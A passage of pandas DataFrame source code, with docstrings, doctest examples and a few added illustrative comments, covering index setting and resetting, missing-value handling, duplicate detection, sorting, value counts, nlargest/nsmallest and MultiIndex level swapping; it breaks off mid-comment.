"""
Set the DataFrame index using existing columns.
Set the DataFrame index (row labels) using one or more existing
columns or arrays (of the correct length). The index can replace the
existing index or expand on it.
Parameters
----------
keys : label or array-like or list of labels/arrays
This parameter can be either a single column key, a single array of
the same length as the calling DataFrame, or a list containing an
arbitrary combination of column keys and arrays. Here, "array"
encompasses :class:`Series`, :class:`Index`, ``np.ndarray``, and
instances of :class:`~collections.abc.Iterator`.
drop : bool, default True
Delete columns to be used as the new index.
append : bool, default False
Whether to append columns to existing index.
inplace : bool, default False
Modify the DataFrame in place (do not create a new object).
verify_integrity : bool, default False
Check the new index for duplicates. Otherwise defer the check until
necessary. Setting to False will improve the performance of this
method.
Returns
-------
DataFrame or None
Changed row labels or None if ``inplace=True``.
See Also
--------
DataFrame.reset_index : Opposite of set_index.
DataFrame.reindex : Change to new indices or expand indices.
DataFrame.reindex_like : Change to same indices as other DataFrame.
Examples
--------
>>> df = pd.DataFrame({'month': [1, 4, 7, 10],
... 'year': [2012, 2014, 2013, 2014],
... 'sale': [55, 40, 84, 31]})
>>> df
month year sale
0 1 2012 55
1 4 2014 40
2 7 2013 84
3 10 2014 31
Set the index to become the 'month' column:
>>> df.set_index('month')
year sale
month
1 2012 55
4 2014 40
7 2013 84
10 2014 31
Create a MultiIndex using columns 'year' and 'month':
>>> df.set_index(['year', 'month'])
sale
year month
2012 1 55
2014 4 40
2013 7 84
2014 10 31
Create a MultiIndex using an Index and a column:
>>> df.set_index([pd.Index([1, 2, 3, 4]), 'year'])
month sale
year
1 2012 1 55
2 2014 4 40
3 2013 7 84
4 2014 10 31
Create a MultiIndex using two Series:
>>> s = pd.Series([1, 2, 3, 4])
>>> df.set_index([s, s**2])
month year sale
1 1 1 2012 55
2 4 4 2014 40
3 9 7 2013 84
4 16 10 2014 31
"""
inplace = validate_bool_kwarg(inplace, "inplace")
self._check_inplace_and_allows_duplicate_labels(inplace)
if not isinstance(keys, list):
keys = [keys]
err_msg = (
'The parameter "keys" may be a column key, one-dimensional '
"array, or a list containing only valid column keys and "
"one-dimensional arrays."
)
missing: List[Label] = []
for col in keys:
if isinstance(col, (Index, Series, np.ndarray, list, abc.Iterator)):
# arrays are fine as long as they are one-dimensional
# iterators get converted to list below
if getattr(col, "ndim", 1) != 1:
raise ValueError(err_msg)
else:
# everything else gets tried as a key; see GH 24969
try:
found = col in self.columns
except TypeError as err:
raise TypeError(
f"{err_msg}. Received column of type {type(col)}"
) from err
else:
if not found:
missing.append(col)
if missing:
raise KeyError(f"None of {missing} are in the columns")
if inplace:
frame = self
else:
frame = self.copy()
arrays = []
names: List[Label] = []
if append:
names = list(self.index.names)
if isinstance(self.index, MultiIndex):
for i in range(self.index.nlevels):
arrays.append(self.index._get_level_values(i))
else:
arrays.append(self.index)
to_remove: List[Label] = []
for col in keys:
if isinstance(col, MultiIndex):
for n in range(col.nlevels):
arrays.append(col._get_level_values(n))
names.extend(col.names)
elif isinstance(col, (Index, Series)):
# if Index then not MultiIndex (treated above)
arrays.append(col)
names.append(col.name)
elif isinstance(col, (list, np.ndarray)):
arrays.append(col)
names.append(None)
elif isinstance(col, abc.Iterator):
arrays.append(list(col))
names.append(None)
# from here, col can only be a column label
else:
arrays.append(frame[col]._values)
names.append(col)
if drop:
to_remove.append(col)
if len(arrays[-1]) != len(self):
# check newest element against length of calling frame, since
# ensure_index_from_sequences would not raise for append=False.
raise ValueError(
f"Length mismatch: Expected {len(self)} rows, "
f"received array of length {len(arrays[-1])}"
)
index = ensure_index_from_sequences(arrays, names)
if verify_integrity and not index.is_unique:
duplicates = index[index.duplicated()].unique()
raise ValueError(f"Index has duplicate keys: {duplicates}")
# use set to handle duplicate column names gracefully in case of drop
for c in set(to_remove):
del frame[c]
# clear up memory usage
index._cleanup()
frame.index = index
if not inplace:
return frame
def reset_index(
self,
level: Optional[Union[Hashable, Sequence[Hashable]]] = None,
drop: bool = False,
inplace: bool = False,
col_level: Hashable = 0,
col_fill: Label = "",
) -> Optional[DataFrame]:
"""
Reset the index, or a level of it.
Reset the index of the DataFrame, and use the default one instead.
If the DataFrame has a MultiIndex, this method can remove one or more
levels.
Parameters
----------
level : int, str, tuple, or list, default None
Only remove the given levels from the index. Removes all levels by
default.
drop : bool, default False
Do not try to insert index into dataframe columns. This resets
the index to the default integer index.
inplace : bool, default False
Modify the DataFrame in place (do not create a new object).
col_level : int or str, default 0
If the columns have multiple levels, determines which level the
labels are inserted into. By default it is inserted into the first
level.
col_fill : object, default ''
If the columns have multiple levels, determines how the other
levels are named. If None then the index name is repeated.
Returns
-------
DataFrame or None
DataFrame with the new index or None if ``inplace=True``.
See Also
--------
DataFrame.set_index : Opposite of reset_index.
DataFrame.reindex : Change to new indices or expand indices.
DataFrame.reindex_like : Change to same indices as other DataFrame.
Examples
--------
>>> df = pd.DataFrame([('bird', 389.0),
... ('bird', 24.0),
... ('mammal', 80.5),
... ('mammal', np.nan)],
... index=['falcon', 'parrot', 'lion', 'monkey'],
... columns=('class', 'max_speed'))
>>> df
class max_speed
falcon bird 389.0
parrot bird 24.0
lion mammal 80.5
monkey mammal NaN
When we reset the index, the old index is added as a column, and a
new sequential index is used:
>>> df.reset_index()
index class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
We can use the `drop` parameter to avoid the old index being added as
a column:
>>> df.reset_index(drop=True)
class max_speed
0 bird 389.0
1 bird 24.0
2 mammal 80.5
3 mammal NaN
You can also use `reset_index` with `MultiIndex`.
>>> index = pd.MultiIndex.from_tuples([('bird', 'falcon'),
... ('bird', 'parrot'),
... ('mammal', 'lion'),
... ('mammal', 'monkey')],
... names=['class', 'name'])
>>> columns = pd.MultiIndex.from_tuples([('speed', 'max'),
... ('species', 'type')])
>>> df = pd.DataFrame([(389.0, 'fly'),
... ( 24.0, 'fly'),
... ( 80.5, 'run'),
... (np.nan, 'jump')],
... index=index,
... columns=columns)
>>> df
speed species
max type
class name
bird falcon 389.0 fly
parrot 24.0 fly
mammal lion 80.5 run
monkey NaN jump
If the index has multiple levels, we can reset a subset of them:
>>> df.reset_index(level='class')
class speed species
max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we are not dropping the index, by default, it is placed in the top
level. We can place it in another level:
>>> df.reset_index(level='class', col_level=1)
speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
When the index is inserted under another level, we can specify under
which one with the parameter `col_fill`:
>>> df.reset_index(level='class', col_level=1, col_fill='species')
species speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
If we specify a nonexistent level for `col_fill`, it is created:
>>> df.reset_index(level='class', col_level=1, col_fill='genus')
genus speed species
class max type
name
falcon bird 389.0 fly
parrot bird 24.0 fly
lion mammal 80.5 run
monkey mammal NaN jump
"""
inplace = validate_bool_kwarg(inplace, "inplace")
self._check_inplace_and_allows_duplicate_labels(inplace)
if inplace:
new_obj = self
else:
new_obj = self.copy()
new_index = ibase.default_index(len(new_obj))
if level is not None:
if not isinstance(level, (tuple, list)):
level = [level]
level = [self.index._get_level_number(lev) for lev in level]
if len(level) < self.index.nlevels:
new_index = self.index.droplevel(level)
if not drop:
to_insert: Iterable[Tuple[Any, Optional[Any]]]
if isinstance(self.index, MultiIndex):
names = [
(n if n is not None else f"level_{i}")
for i, n in enumerate(self.index.names)
]
to_insert = zip(self.index.levels, self.index.codes)
else:
default = "index" if "index" not in self else "level_0"
names = [default] if self.index.name is None else [self.index.name]
to_insert = ((self.index, None),)
multi_col = isinstance(self.columns, MultiIndex)
for i, (lev, lab) in reversed(list(enumerate(to_insert))):
if not (level is None or i in level):
continue
name = names[i]
if multi_col:
col_name = list(name) if isinstance(name, tuple) else [name]
if col_fill is None:
if len(col_name) not in (1, self.columns.nlevels):
raise ValueError(
"col_fill=None is incompatible "
f"with incomplete column name {name}"
)
col_fill = col_name[0]
lev_num = self.columns._get_level_number(col_level)
name_lst = [col_fill] * lev_num + col_name
missing = self.columns.nlevels - len(name_lst)
name_lst += [col_fill] * missing
name = tuple(name_lst)
# to ndarray and maybe infer different dtype
level_values = maybe_casted_values(lev, lab)
new_obj.insert(0, name, level_values)
new_obj.index = new_index
if not inplace:
return new_obj
return None
# ----------------------------------------------------------------------
# Reindex-based selection methods
@doc(NDFrame.isna, klass=_shared_doc_kwargs["klass"])
def isna(self) -> DataFrame:
result = self._constructor(self._mgr.isna(func=isna))
return result.__finalize__(self, method="isna")
@doc(NDFrame.isna, klass=_shared_doc_kwargs["klass"])
def isnull(self) -> DataFrame:
return self.isna()
@doc(NDFrame.notna, klass=_shared_doc_kwargs["klass"])
def notna(self) -> DataFrame:
return ~self.isna()
@doc(NDFrame.notna, klass=_shared_doc_kwargs["klass"])
def notnull(self) -> DataFrame:
return ~self.isna()
def dropna(self, axis=0, how="any", thresh=None, subset=None, inplace=False):
"""
Remove missing values.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
Determine if rows or columns which contain missing values are
removed.
* 0, or 'index' : Drop rows which contain missing values.
* 1, or 'columns' : Drop columns which contain missing value.
.. versionchanged:: 1.0.0
Passing a tuple or list to drop on multiple axes is no longer
supported; only a single axis is allowed.
how : {'any', 'all'}, default 'any'
Determine if row or column is removed from DataFrame, when we have
at least one NA or all NA.
* 'any' : If any NA values are present, drop that row or column.
* 'all' : If all values are NA, drop that row or column.
thresh : int, optional
Require that many non-NA values.
subset : array-like, optional
Labels along other axis to consider, e.g. if you are dropping rows
these would be a list of columns to include.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
DataFrame or None
DataFrame with NA entries dropped from it or None if ``inplace=True``.
See Also
--------
DataFrame.isna: Indicate missing values.
DataFrame.notna : Indicate existing (non-missing) values.
DataFrame.fillna : Replace missing values.
Series.dropna : Drop missing values.
Index.dropna : Drop missing indices.
Examples
--------
>>> df = pd.DataFrame({"name": ['Alfred', 'Batman', 'Catwoman'],
... "toy": [np.nan, 'Batmobile', 'Bullwhip'],
... "born": [pd.NaT, pd.Timestamp("1940-04-25"),
... pd.NaT]})
>>> df
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Drop the rows where at least one element is missing.
>>> df.dropna()
name toy born
1 Batman Batmobile 1940-04-25
Drop the columns where at least one element is missing.
>>> df.dropna(axis='columns')
name
0 Alfred
1 Batman
2 Catwoman
Drop the rows where all elements are missing.
>>> df.dropna(how='all')
name toy born
0 Alfred NaN NaT
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep only the rows with at least 2 non-NA values.
>>> df.dropna(thresh=2)
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Define in which columns to look for missing values.
>>> df.dropna(subset=['name', 'toy'])
name toy born
1 Batman Batmobile 1940-04-25
2 Catwoman Bullwhip NaT
Keep the DataFrame with valid entries in the same variable.
>>> df.dropna(inplace=True)
>>> df
name toy born
1 Batman Batmobile 1940-04-25
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if isinstance(axis, (tuple, list)):
# GH20987
raise TypeError("supplying multiple axes to axis is no longer supported.")
axis = self._get_axis_number(axis)
agg_axis = 1 - axis
agg_obj = self
if subset is not None:
ax = self._get_axis(agg_axis)
indices = ax.get_indexer_for(subset)
check = indices == -1
if check.any():
raise KeyError(list(np.compress(check, subset)))
agg_obj = self.take(indices, axis=agg_axis)
count = agg_obj.count(axis=agg_axis)
if thresh is not None:
mask = count >= thresh
elif how == "any":
mask = count == len(agg_obj._get_axis(agg_axis))
elif how == "all":
mask = count > 0
else:
if how is not None:
raise ValueError(f"invalid how option: {how}")
else:
raise TypeError("must specify how or thresh")
result = self.loc(axis=axis)[mask]
if inplace:
self._update_inplace(result)
else:
return result
def drop_duplicates(
self,
subset: Optional[Union[Hashable, Sequence[Hashable]]] = None,
keep: Union[str, bool] = "first",
inplace: bool = False,
ignore_index: bool = False,
) -> Optional[DataFrame]:
"""
Return DataFrame with duplicate rows removed.
Considering certain columns is optional. Indexes, including time indexes,
are ignored.
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns.
keep : {'first', 'last', False}, default 'first'
Determines which duplicates (if any) to keep.
- ``first`` : Drop duplicates except for the first occurrence.
- ``last`` : Drop duplicates except for the last occurrence.
- False : Drop all duplicates.
inplace : bool, default False
Whether to drop duplicates in place or to return a copy.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.0.0
Returns
-------
DataFrame or None
DataFrame with duplicates removed or None if ``inplace=True``.
See Also
--------
DataFrame.value_counts: Count unique combinations of columns.
Examples
--------
Consider dataset containing ramen rating.
>>> df = pd.DataFrame({
... 'brand': ['Yum Yum', 'Yum Yum', 'Indomie', 'Indomie', 'Indomie'],
... 'style': ['cup', 'cup', 'cup', 'pack', 'pack'],
... 'rating': [4, 4, 3.5, 15, 5]
... })
>>> df
brand style rating
0 Yum Yum cup 4.0
1 Yum Yum cup 4.0
2 Indomie cup 3.5
3 Indomie pack 15.0
4 Indomie pack 5.0
By default, it removes duplicate rows based on all columns.
>>> df.drop_duplicates()
brand style rating
0 Yum Yum cup 4.0
2 Indomie cup 3.5
3 Indomie pack 15.0
4 Indomie pack 5.0
To remove duplicates on specific column(s), use ``subset``.
>>> df.drop_duplicates(subset=['brand'])
brand style rating
0 Yum Yum cup 4.0
2 Indomie cup 3.5
To remove duplicates and keep last occurrences, use ``keep``.
>>> df.drop_duplicates(subset=['brand', 'style'], keep='last')
brand style rating
1 Yum Yum cup 4.0
2 Indomie cup 3.5
4 Indomie pack 5.0
"""
if self.empty:
return self.copy()
inplace = validate_bool_kwarg(inplace, "inplace")
duplicated = self.duplicated(subset, keep=keep)
result = self[~duplicated]
if ignore_index:
result.index = ibase.default_index(len(result))
if inplace:
self._update_inplace(result)
return None
else:
return result
def duplicated(
self,
subset: Optional[Union[Hashable, Sequence[Hashable]]] = None,
keep: Union[str, bool] = "first",
) -> Series:
"""
Return boolean Series denoting duplicate rows.
Considering certain columns is optional.
Parameters
----------
subset : column label or sequence of labels, optional
Only consider certain columns for identifying duplicates, by
default use all of the columns.
keep : {'first', 'last', False}, default 'first'
Determines which duplicates (if any) to mark.
- ``first`` : Mark duplicates as ``True`` except for the first occurrence.
- ``last`` : Mark duplicates as ``True`` except for the last occurrence.
- False : Mark all duplicates as ``True``.
Returns
-------
Series
Boolean series indicating duplicate rows.
See Also
--------
Index.duplicated : Equivalent method on index.
Series.duplicated : Equivalent method on Series.
Series.drop_duplicates : Remove duplicate values from Series.
DataFrame.drop_duplicates : Remove duplicate values from DataFrame.
Examples
--------
Consider dataset containing ramen rating.
>>> df = pd.DataFrame({
... 'brand': ['Yum Yum', 'Yum Yum', 'Indomie', 'Indomie', 'Indomie'],
... 'style': ['cup', 'cup', 'cup', 'pack', 'pack'],
... 'rating': [4, 4, 3.5, 15, 5]
... })
>>> df
brand style rating
0 Yum Yum cup 4.0
1 Yum Yum cup 4.0
2 Indomie cup 3.5
3 Indomie pack 15.0
4 Indomie pack 5.0
By default, for each set of duplicated values, the first occurrence
is set to False and all others to True.
>>> df.duplicated()
0 False
1 True
2 False
3 False
4 False
dtype: bool
By using 'last', the last occurrence of each set of duplicated values
is set to False and all others to True.
>>> df.duplicated(keep='last')
0 True
1 False
2 False
3 False
4 False
dtype: bool
By setting ``keep`` to False, all duplicates are marked True.
>>> df.duplicated(keep=False)
0 True
1 True
2 False
3 False
4 False
dtype: bool
To find duplicates on specific column(s), use ``subset``.
>>> df.duplicated(subset=['brand'])
0 False
1 True
2 False
3 True
4 True
dtype: bool
"""
from pandas._libs.hashtable import SIZE_HINT_LIMIT, duplicated_int64
from pandas.core.sorting import get_group_index
if self.empty:
return self._constructor_sliced(dtype=bool)
def f(vals):
labels, shape = algorithms.factorize(
vals, size_hint=min(len(self), SIZE_HINT_LIMIT)
)
return labels.astype("i8", copy=False), len(shape)
if subset is None:
subset = self.columns
elif (
not np.iterable(subset)
or isinstance(subset, str)
or isinstance(subset, tuple)
and subset in self.columns
):
subset = (subset,)
# needed for mypy since can't narrow types using np.iterable
subset = cast(Iterable, subset)
# Verify all columns in subset exist in the queried dataframe
# Otherwise, raise a KeyError, same as if you try to __getitem__ with a
# key that doesn't exist.
diff = Index(subset).difference(self.columns)
if not diff.empty:
raise KeyError(diff)
vals = (col.values for name, col in self.items() if name in subset)
labels, shape = map(list, zip(*map(f, vals)))
ids = get_group_index(labels, shape, sort=False, xnull=False)
return self._constructor_sliced(duplicated_int64(ids, keep), index=self.index)
# ----------------------------------------------------------------------
# Sorting
# TODO: Just move the sort_values doc here.
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.sort_values.__doc__)
# error: Signature of "sort_values" incompatible with supertype "NDFrame"
def sort_values( # type: ignore[override]
self,
by,
axis=0,
ascending=True,
inplace=False,
kind="quicksort",
na_position="last",
ignore_index=False,
key: ValueKeyFunc = None,
):
inplace = validate_bool_kwarg(inplace, "inplace")
axis = self._get_axis_number(axis)
if not isinstance(by, list):
by = [by]
if is_sequence(ascending) and len(by) != len(ascending):
raise ValueError(
f"Length of ascending ({len(ascending)}) != length of by ({len(by)})"
)
if len(by) > 1:
from pandas.core.sorting import lexsort_indexer
keys = [self._get_label_or_level_values(x, axis=axis) for x in by]
# need to rewrap columns in Series to apply key function
if key is not None:
keys = [Series(k, name=name) for (k, name) in zip(keys, by)]
indexer = lexsort_indexer(
keys, orders=ascending, na_position=na_position, key=key
)
indexer = ensure_platform_int(indexer)
else:
from pandas.core.sorting import nargsort
by = by[0]
k = self._get_label_or_level_values(by, axis=axis)
# need to rewrap column in Series to apply key function
if key is not None:
k = Series(k, name=by)
if isinstance(ascending, (tuple, list)):
ascending = ascending[0]
indexer = nargsort(
k, kind=kind, ascending=ascending, na_position=na_position, key=key
)
new_data = self._mgr.take(
indexer, axis=self._get_block_manager_axis(axis), verify=False
)
if ignore_index:
new_data.axes[1] = ibase.default_index(len(indexer))
result = self._constructor(new_data)
if inplace:
return self._update_inplace(result)
else:
return result.__finalize__(self, method="sort_values")
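# Hedged usage sketch for the ``key`` path above (hypothetical data, not part
# of the pandas source): each "by" column is rewrapped in a Series before the
# key callable is applied, so vectorised string methods work, e.g.
# case-insensitive sorting:
#
#   >>> df = pd.DataFrame({"name": ["banana", "Apple", "cherry"]})
#   >>> df.sort_values("name", key=lambda s: s.str.lower())["name"].tolist()
#   ['Apple', 'banana', 'cherry']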
def sort_index(
self,
axis=0,
level=None,
ascending: bool = True,
inplace: bool = False,
kind: str = "quicksort",
na_position: str = "last",
sort_remaining: bool = True,
ignore_index: bool = False,
key: IndexKeyFunc = None,
):
"""
Sort object by labels (along an axis).
Returns a new DataFrame sorted by label if `inplace` argument is
``False``, otherwise updates the original DataFrame and returns None.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis along which to sort. The value 0 identifies the rows,
and 1 identifies the columns.
level : int or level name or list of ints or list of level names
If not None, sort on values in specified index level(s).
ascending : bool or list of bools, default True
Sort ascending vs. descending. When the index is a MultiIndex the
sort direction can be controlled for each level individually.
inplace : bool, default False
If True, perform operation in-place.
kind : {'quicksort', 'mergesort', 'heapsort'}, default 'quicksort'
Choice of sorting algorithm. See also :func:`numpy.sort` for more
information. `mergesort` is the only stable algorithm. For
DataFrames, this option is only applied when sorting on a single
column or label.
na_position : {'first', 'last'}, default 'last'
Puts NaNs at the beginning if `first`; `last` puts NaNs at the end.
Not implemented for MultiIndex.
sort_remaining : bool, default True
If True and sorting by level and index is multilevel, sort by other
levels too (in order) after sorting by specified level.
ignore_index : bool, default False
If True, the resulting axis will be labeled 0, 1, …, n - 1.
.. versionadded:: 1.0.0
key : callable, optional
If not None, apply the key function to the index values
before sorting. This is similar to the `key` argument in the
builtin :meth:`sorted` function, with the notable difference that
this `key` function should be *vectorized*. It should expect an
``Index`` and return an ``Index`` of the same shape. For MultiIndex
inputs, the key is applied *per level*.
.. versionadded:: 1.1.0
Returns
-------
DataFrame or None
The original DataFrame sorted by the labels or None if ``inplace=True``.
See Also
--------
Series.sort_index : Sort Series by the index.
DataFrame.sort_values : Sort DataFrame by the value.
Series.sort_values : Sort Series by the value.
Examples
--------
>>> df = pd.DataFrame([1, 2, 3, 4, 5], index=[100, 29, 234, 1, 150],
... columns=['A'])
>>> df.sort_index()
A
1 4
29 2
100 1
150 5
234 3
By default, it sorts in ascending order; to sort in descending order,
use ``ascending=False``.
>>> df.sort_index(ascending=False)
A
234 3
150 5
100 1
29 2
1 4
A key function can be specified which is applied to the index before
sorting. For a ``MultiIndex`` this is applied to each level separately.
>>> df = pd.DataFrame({"a": [1, 2, 3, 4]}, index=['A', 'b', 'C', 'd'])
>>> df.sort_index(key=lambda x: x.str.lower())
a
A 1
b 2
C 3
d 4
"""
return super().sort_index(
axis,
level,
ascending,
inplace,
kind,
na_position,
sort_remaining,
ignore_index,
key,
)
def value_counts(
self,
subset: Optional[Sequence[Label]] = None,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
):
"""
Return a Series containing counts of unique rows in the DataFrame.
.. versionadded:: 1.1.0
Parameters
----------
subset : list-like, optional
Columns to use when counting unique combinations.
normalize : bool, default False
Return proportions rather than frequencies.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
Returns
-------
Series
See Also
--------
Series.value_counts: Equivalent method on Series.
Notes
-----
The returned Series will have a MultiIndex with one level per input
column. By default, rows that contain any NA values are omitted from
the result. By default, the resulting Series will be in descending
order so that the first element is the most frequently-occurring row.
Examples
--------
>>> df = pd.DataFrame({'num_legs': [2, 4, 4, 6],
... 'num_wings': [2, 0, 0, 0]},
... index=['falcon', 'dog', 'cat', 'ant'])
>>> df
num_legs num_wings
falcon 2 2
dog 4 0
cat 4 0
ant 6 0
>>> df.value_counts()
num_legs num_wings
4 0 2
6 0 1
2 2 1
dtype: int64
>>> df.value_counts(sort=False)
num_legs num_wings
2 2 1
4 0 2
6 0 1
dtype: int64
>>> df.value_counts(ascending=True)
num_legs num_wings
2 2 1
6 0 1
4 0 2
dtype: int64
>>> df.value_counts(normalize=True)
num_legs num_wings
4 0 0.50
6 0 0.25
2 2 0.25
dtype: float64
"""
if subset is None:
subset = self.columns.tolist()
counts = self.groupby(subset).grouper.size()
if sort:
counts = counts.sort_values(ascending=ascending)
if normalize:
counts /= counts.sum()
# Force MultiIndex for single column
if len(subset) == 1:
counts.index = MultiIndex.from_arrays(
[counts.index], names=[counts.index.name]
)
return counts
def nlargest(self, n, columns, keep="first") -> DataFrame:
"""
Return the first `n` rows ordered by `columns` in descending order.
Return the first `n` rows with the largest values in `columns`, in
descending order. The columns that are not specified are returned as
well, but not used for ordering.
This method is equivalent to
``df.sort_values(columns, ascending=False).head(n)``, but more
performant.
Parameters
----------
n : int
Number of rows to return.
columns : label or list of labels
Column label(s) to order by.
keep : {'first', 'last', 'all'}, default 'first'
Where there are duplicate values:
- `first` : prioritize the first occurrence(s)
- `last` : prioritize the last occurrence(s)
- ``all`` : do not drop any duplicates, even if it means
selecting more than `n` items.
.. versionadded:: 0.24.0
Returns
-------
DataFrame
The first `n` rows ordered by the given columns in descending
order.
See Also
--------
DataFrame.nsmallest : Return the first `n` rows ordered by `columns` in
ascending order.
DataFrame.sort_values : Sort DataFrame by the values.
DataFrame.head : Return the first `n` rows without re-ordering.
Notes
-----
This function cannot be used with all column types. For example, when
specifying columns with `object` or `category` dtypes, ``TypeError`` is
raised.
Examples
--------
>>> df = pd.DataFrame({'population': [59000000, 65000000, 434000,
... 434000, 434000, 337000, 11300,
... 11300, 11300],
... 'GDP': [1937894, 2583560 , 12011, 4520, 12128,
... 17036, 182, 38, 311],
... 'alpha-2': ["IT", "FR", "MT", "MV", "BN",
... "IS", "NR", "TV", "AI"]},
... index=["Italy", "France", "Malta",
... "Maldives", "Brunei", "Iceland",
... "Nauru", "Tuvalu", "Anguilla"])
>>> df
population GDP alpha-2
Italy 59000000 1937894 IT
France 65000000 2583560 FR
Malta 434000 12011 MT
Maldives 434000 4520 MV
Brunei 434000 12128 BN
Iceland 337000 17036 IS
Nauru 11300 182 NR
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
In the following example, we will use ``nlargest`` to select the three
rows having the largest values in column "population".
>>> df.nlargest(3, 'population')
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Malta 434000 12011 MT
When using ``keep='last'``, ties are resolved in reverse order:
>>> df.nlargest(3, 'population', keep='last')
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Brunei 434000 12128 BN
When using ``keep='all'``, all duplicate items are maintained:
>>> df.nlargest(3, 'population', keep='all')
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Malta 434000 12011 MT
Maldives 434000 4520 MV
Brunei 434000 12128 BN
To order by the largest values in column "population" and then "GDP",
we can specify multiple columns like in the next example.
>>> df.nlargest(3, ['population', 'GDP'])
population GDP alpha-2
France 65000000 2583560 FR
Italy 59000000 1937894 IT
Brunei 434000 12128 BN
"""
return algorithms.SelectNFrame(self, n=n, keep=keep, columns=columns).nlargest()
def nsmallest(self, n, columns, keep="first") -> DataFrame:
"""
Return the first `n` rows ordered by `columns` in ascending order.
Return the first `n` rows with the smallest values in `columns`, in
ascending order. The columns that are not specified are returned as
well, but not used for ordering.
This method is equivalent to
``df.sort_values(columns, ascending=True).head(n)``, but more
performant.
Parameters
----------
n : int
Number of items to retrieve.
columns : list or str
Column name or names to order by.
keep : {'first', 'last', 'all'}, default 'first'
Where there are duplicate values:
- ``first`` : take the first occurrence.
- ``last`` : take the last occurrence.
- ``all`` : do not drop any duplicates, even if it means
selecting more than `n` items.
.. versionadded:: 0.24.0
Returns
-------
DataFrame
See Also
--------
DataFrame.nlargest : Return the first `n` rows ordered by `columns` in
descending order.
DataFrame.sort_values : Sort DataFrame by the values.
DataFrame.head : Return the first `n` rows without re-ordering.
Examples
--------
>>> df = pd.DataFrame({'population': [59000000, 65000000, 434000,
... 434000, 434000, 337000, 337000,
... 11300, 11300],
... 'GDP': [1937894, 2583560 , 12011, 4520, 12128,
... 17036, 182, 38, 311],
... 'alpha-2': ["IT", "FR", "MT", "MV", "BN",
... "IS", "NR", "TV", "AI"]},
... index=["Italy", "France", "Malta",
... "Maldives", "Brunei", "Iceland",
... "Nauru", "Tuvalu", "Anguilla"])
>>> df
population GDP alpha-2
Italy 59000000 1937894 IT
France 65000000 2583560 FR
Malta 434000 12011 MT
Maldives 434000 4520 MV
Brunei 434000 12128 BN
Iceland 337000 17036 IS
Nauru 337000 182 NR
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
In the following example, we will use ``nsmallest`` to select the
three rows having the smallest values in column "population".
>>> df.nsmallest(3, 'population')
population GDP alpha-2
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
Iceland 337000 17036 IS
When using ``keep='last'``, ties are resolved in reverse order:
>>> df.nsmallest(3, 'population', keep='last')
population GDP alpha-2
Anguilla 11300 311 AI
Tuvalu 11300 38 TV
Nauru 337000 182 NR
When using ``keep='all'``, all duplicate items are maintained:
>>> df.nsmallest(3, 'population', keep='all')
population GDP alpha-2
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
Iceland 337000 17036 IS
Nauru 337000 182 NR
To order by the smallest values in column "population" and then "GDP", we can
specify multiple columns like in the next example.
>>> df.nsmallest(3, ['population', 'GDP'])
population GDP alpha-2
Tuvalu 11300 38 TV
Anguilla 11300 311 AI
Nauru 337000 182 NR
"""
return algorithms.SelectNFrame(
self, n=n, keep=keep, columns=columns
).nsmallest()
def swaplevel(self, i=-2, j=-1, axis=0) -> DataFrame:
"""
Swap levels i and j in a MultiIndex on a particular axis.
Parameters
----------
i, j : int or str
Levels of the indices to be swapped. Can pass level name as string.
axis : {0 or 'index', 1 or 'columns'}, default 0
The axis to swap levels on. 0 or 'index' for row-wise, 1 or
'columns' for column-wise.
Returns
-------
DataFrame
"""
result = self.copy()
axis = self._get_axis_number(axis)
if not isinstance(result._get_axis(axis), MultiIndex): # pragma: no cover
raise TypeError("Can only swap levels on a hierarchical axis.")
if axis == 0:
assert isinstance(result.index, MultiIndex)
result.index = result.index.swaplevel(i, j)
else:
assert isinstance(result.columns, MultiIndex)
result.columns = result.columns.swaplevel(i, j)
return result
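# Illustrative sketch for ``swaplevel`` (hypothetical index, not part of the
# pandas source):
#
#   >>> idx = pd.MultiIndex.from_tuples([("a", 1), ("b", 2)], names=["x", "y"])
#   >>> df = pd.DataFrame({"v": [10, 20]}, index=idx)
#   >>> df.swaplevel("x", "y").index.names
#   FrozenList(['y', 'x'])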
def reorder_levels(self, order, axis=0) -> DataFrame:
"""
Rearrange index levels using input order. May not drop or duplicate levels.
Parameters
----------
order : list of int or list of str
List representing new level order. Reference level by number
(position) or by key (label).
axis : {0 or 'index', 1 or 'columns'}, default 0
Where to reorder levels.
Returns
-------
DataFrame
"""
axis = self._get_axis_number(axis)
if not isinstance(self._get_axis(axis), MultiIndex): # pragma: no cover
raise TypeError("Can only reorder levels on a hierarchical axis.")
result = self.copy()
if axis == 0:
assert isinstance(result.index, MultiIndex)
result.index = result.index.reorder_levels(order)
else:
assert isinstance(result.columns, MultiIndex)
result.columns = result.columns.reorder_levels(order)
return result
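# Illustrative sketch for ``reorder_levels`` (hypothetical index, not part of
# the pandas source); unlike ``swaplevel`` it takes the full target order:
#
#   >>> idx = pd.MultiIndex.from_tuples(
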